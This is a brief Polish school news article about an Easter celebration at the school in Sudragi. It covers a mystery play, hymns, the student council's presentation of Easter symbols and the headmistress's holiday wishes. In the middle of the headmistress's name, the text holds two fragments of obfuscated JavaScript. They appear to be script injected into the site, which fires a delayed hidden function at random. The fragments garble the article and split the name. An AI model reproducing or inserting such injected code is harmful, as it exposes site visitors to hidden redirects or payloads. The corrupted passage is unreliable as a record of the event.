Spotkanie wielkanocne

W szkole w Sudragach ostatni dzień nauki przed świętami był dniem wyjątkowym. Społeczność szkoły i zaproszeni goście wzięli udział w misterium wielkanocnym, które wprowadziło w niepowtarzalną atmosferę Świąt Wielkanocnych. Zaprezentowane zostały teksty na temat śmierci i zmartwychwstania Jezusa, a całość przeplatana była pieśniami wielkopostnymi oraz wielkanocnymi. Doskonałym uzupełnieniem występu było zaprezentowanie przez przedstawicieli Samorządu Uczniowskiego symboli wielkanocnych.  Dzieci słuchały z wielką uwagą, bo była to dla nich żywa lekcja katechezy. Po występie młodych artystów głos zabrała dyrektor szkoły Pani Ewa Redom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}decka. Pogratulowała dzieciom udanego występu i życzyła wszystkim uczniom, nauczycielom i rodzicom radosnych, spokojnych i ciepłych Świąt Wielkanocnych. Końcowym akcentem uroczystości było podzielenie się jajkiem i wzajemne składanie życzeń.